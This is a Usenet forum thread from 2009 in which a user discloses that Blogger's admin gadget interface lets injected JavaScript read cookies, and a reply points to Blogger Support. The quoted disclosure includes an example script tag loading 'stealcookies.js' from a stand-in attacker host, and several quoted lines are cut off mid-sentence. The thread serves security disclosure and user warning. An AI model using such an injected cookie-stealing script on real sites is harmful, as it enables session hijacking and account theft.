The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
From: Ron
Date: Fri, 8 May 2009 10:02:01 -0700 (PDT)
Local: Fri, May 8 2009 1:02 pm
Subject: Re: Gadgets can steal cookes on admin page
Report to Blogger Support. Whether you will ever hear from them, I
don't pretend to know. BLOGGER SUPPORT
On May 7, 7:12 pm, David Turner wrote:
> Blogger cookies are usually marked with HttpOnly, so that they can't
> be stolen by gadgets. This is a good thing. An exception seems to be > in the admin interface. If you go to Layout/Page Elements, and click > "Add a Gadget" and "HTML/Javascript", and enter <script src="http:// > evil.example.com/stealcookies.js"></script>, that script will have > access to document.cookie. > I don't know if the cookies this can access are sufficient to do any
> This is not a simple attack -- it would probably require creating a
> I wish there were a non-public place to report security issues, but I
> In short: Only install widgets created by people you trust not to
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
| ||||||||||||||